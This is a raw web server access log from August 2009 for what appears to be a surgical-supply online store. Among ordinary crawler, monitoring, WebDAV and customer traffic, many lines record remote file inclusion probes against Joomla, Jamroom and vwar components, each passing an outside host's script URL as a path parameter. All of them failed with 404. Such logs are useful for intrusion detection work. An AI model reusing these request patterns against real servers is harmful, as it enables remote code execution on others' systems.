209.172.33.230 - - [05/Aug/2009:09:03:34 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 274 "-" "libwww-perl/5.812"
209.59.12.99 - - [05/Aug/2009:09:03:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.81.182 - - [05/Aug/2009:09:03:26 -0400] "GET /logs/access_log.Q109070400 HTTP/1.0" 200 1764892 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
172.16.1.176 - - [05/Aug/2009:09:04:07 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:09:04:07 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:09:04:07 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:04:12 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:04:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:04:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.81.182 - - [05/Aug/2009:09:03:47 -0400] "GET /logs/access_log.Q109070800 HTTP/1.0" 200 4336924 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.220.213.203 - - [05/Aug/2009:09:04:57 -0400] "GET /logs/access_log.Q109063000/?_zb_path=http://ashaclub.com/bbs/lib/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.30.81.182 - - [05/Aug/2009:09:05:05 -0400] "GET /images/_notes/nav_store_fav_over_r1_c2.jpg.mno HTTP/1.0" 200 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
172.16.1.180 - - [05/Aug/2009:09:05:32 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:05:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:05:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.81.182 - - [05/Aug/2009:09:05:45 -0400] "GET /logs/error_log.Q109080200 HTTP/1.0" 200 2484946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.23.191.23 - - [05/Aug/2009:09:05:51 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:09:05:51 -0400] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:09:05:52 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
72.30.81.182 - - [05/Aug/2009:09:05:58 -0400] "GET /logs/access_log.Q109072800 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.55.227.145 - - [05/Aug/2009:09:06:09 -0400] "GET /logs/access_log.Q109051600//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
218.55.227.145 - - [05/Aug/2009:09:06:10 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
218.55.227.145 - - [05/Aug/2009:09:06:10 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
72.30.81.182 - - [05/Aug/2009:09:05:45 -0400] "GET /logs/error_log.Q109080200 HTTP/1.0" 200 2484946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
172.16.1.180 - - [05/Aug/2009:09:06:41 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:06:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:06:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.236.221.38 - - [05/Aug/2009:09:06:45 -0400] "GET /logs/access_log.Q109070400%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aokgroup.co.uk/cms/components/fx29id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.55.227.145 - - [05/Aug/2009:09:07:22 -0400] "GET /logs/access_log.Q109061200//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
79.23.191.23 - - [05/Aug/2009:09:07:24 -0400] "GET /logs/access_log.Q109071700/index.php?_SERVER[DOCUMENT_ROOT]=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:09:07:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:07:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:09:07:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.81.182 - - [05/Aug/2009:09:08:36 -0400] "GET /logs/error_log.Q109080500 HTTP/1.0" 200 414048 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [05/Aug/2009:09:08:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.87 - - [05/Aug/2009:09:09:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:09:09:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:09:09:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
218.55.227.145 - - [05/Aug/2009:09:11:24 -0400] "GET /logs/access_log.Q109051700//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
79.23.191.23 - - [05/Aug/2009:09:11:55 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
190.144.44.36 - - [05/Aug/2009:09:12:03 -0400] "GET /logs/access_log.Q109051000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
172.16.1.87 - - [05/Aug/2009:09:12:08 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:09:12:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:09:12:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
79.23.191.23 - - [05/Aug/2009:09:12:10 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
190.144.44.36 - - [05/Aug/2009:09:12:16 -0400] "GET /logs/access_log.Q109051000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:09:12:34 -0400] "GET /logs/access_log.Q109072200%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
61.250.92.205 - - [05/Aug/2009:09:13:02 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.250.92.205 - - [05/Aug/2009:09:13:13 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.250.92.205 - - [05/Aug/2009:09:13:25 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:09:13:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.250.92.205 - - [05/Aug/2009:09:13:50 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
172.16.1.170 - - [05/Aug/2009:09:14:12 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [05/Aug/2009:09:14:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [05/Aug/2009:09:14:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:14:30 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:14:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:14:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
38.108.180.115 - - [05/Aug/2009:09:14:41 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
38.108.180.115 - - [05/Aug/2009:09:14:43 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L115ABB4090349500FB3202D+WEBSEQ(S0020):1+WEBPGN(S0070):181040+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS HTTP/1.1" 200 29060 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
172.16.1.82 - - [05/Aug/2009:09:15:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:15:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:09:15:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
220.181.7.125 - - [05/Aug/2009:09:16:20 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.66.122 - - [05/Aug/2009:09:17:15 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
204.12.11.202 - - [05/Aug/2009:09:17:31 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.829"
204.12.11.202 - - [05/Aug/2009:09:17:31 -0400] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.829"
204.12.11.202 - - [05/Aug/2009:09:17:31 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.829"
204.12.11.202 - - [05/Aug/2009:09:17:31 -0400] "GET /logs/access_log.Q109051000//vwar/convert/mvcw.php?step=1&vwar_root=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.829"
91.121.89.135 - - [05/Aug/2009:09:17:40 -0400] "GET /logs/access_log.Q109060300//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:09:17:40 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:09:17:40 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:09:17:40 -0400] "GET /logs/access_log.Q109070700//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.32.69.162 - - [05/Aug/2009:09:17:45 -0400] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://www.blazerprint.com/blazershop/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
72.32.69.162 - - [05/Aug/2009:09:17:45 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.blazerprint.com/blazershop/yes.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
72.32.69.162 - - [05/Aug/2009:09:17:45 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.blazerprint.com/blazershop/yes.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
222.122.6.62 - - [05/Aug/2009:09:17:45 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.122.6.62 - - [05/Aug/2009:09:17:45 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.122.6.62 - - [05/Aug/2009:09:17:45 -0400] "GET /logs/access_log.Q109060300//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.32.69.162 - - [05/Aug/2009:09:17:47 -0400] "GET /logs/access_log.Q109051000//vwar/convert/mvcw.php?step=1&vwar_root=http://www.blazerprint.com/blazershop/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.249.71.201 - - [05/Aug/2009:09:18:00 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH HTTP/1.1" 200 36937 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.172.33.230 - - [05/Aug/2009:09:18:16 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 220 "-" "libwww-perl/5.812"
209.172.33.230 - - [05/Aug/2009:09:18:16 -0400] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
209.172.33.230 - - [05/Aug/2009:09:18:16 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.812"
209.172.33.230 - - [05/Aug/2009:09:18:16 -0400] "GET /logs/access_log.Q109051000//vwar/convert/mvcw.php?step=1&vwar_root=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
222.122.6.62 - - [05/Aug/2009:09:18:34 -0400] "GET /logs/access_log.Q109070700//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:09:18:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
205.203.134.197 - - [05/Aug/2009:09:18:47 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
205.203.134.197 - - [05/Aug/2009:09:18:47 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
216.41.15.154 - - [05/Aug/2009:09:19:24 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:50 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157 HTTP/1.1" 200 45286 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:52 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:52 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:52 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:52 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:52 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:52 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:52 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:53 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:53 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:53 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:53 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:53 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:53 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.41.15.154 - - [05/Aug/2009:09:19:53 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):6052157" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
